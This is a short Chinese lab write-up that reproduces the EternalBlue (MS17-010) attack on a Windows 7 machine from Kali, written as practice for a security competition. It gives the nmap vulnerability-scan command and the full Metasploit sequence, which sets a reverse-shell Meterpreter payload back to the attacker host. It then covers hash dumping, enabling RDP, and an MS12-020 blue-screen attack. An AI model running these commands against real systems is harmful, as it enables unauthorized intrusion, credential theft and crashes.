Fork me on GitHub

复现ms-17010永恒之蓝攻击

由于铁三快开始了,最近复现一下内网的漏洞,昨天复现了一次永恒之蓝的攻击。

工具:msfconsole,nmap

目标机:192.168.137.187(Win7)

攻击机:192.168.137.188(kali)

首先对目标机器用nmap进行扫描:

1
nmap -p445 --script smb-vuln-ms17-010 192.168.137.187

nmap_scan_result

可以发现是存在ms17-010这个漏洞的,之后启动msfconsle,使用EternalBlue永恒之蓝攻击模块,设置攻击主机的ip,payload,监听ip及端口号,然后exploit。

1
2
3
4
5
6
msf > use exploit/windows/smb/ms17_010_eternalblue 
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.137.187
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > set LHOST 192.168.137.188
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf auxiliary(exploit/windows/smb/ms17_010_eternalblue) > exploit

之后取得meterpreter回话,攻击成功。
获取hash值,得到帐号密码

get_password
开启3389

1
meterpreter > run getgui -e

telnet登录

telnet_login

发现是OK的。
开了3389以后还可以用ms12_020蓝屏攻击

blue_attack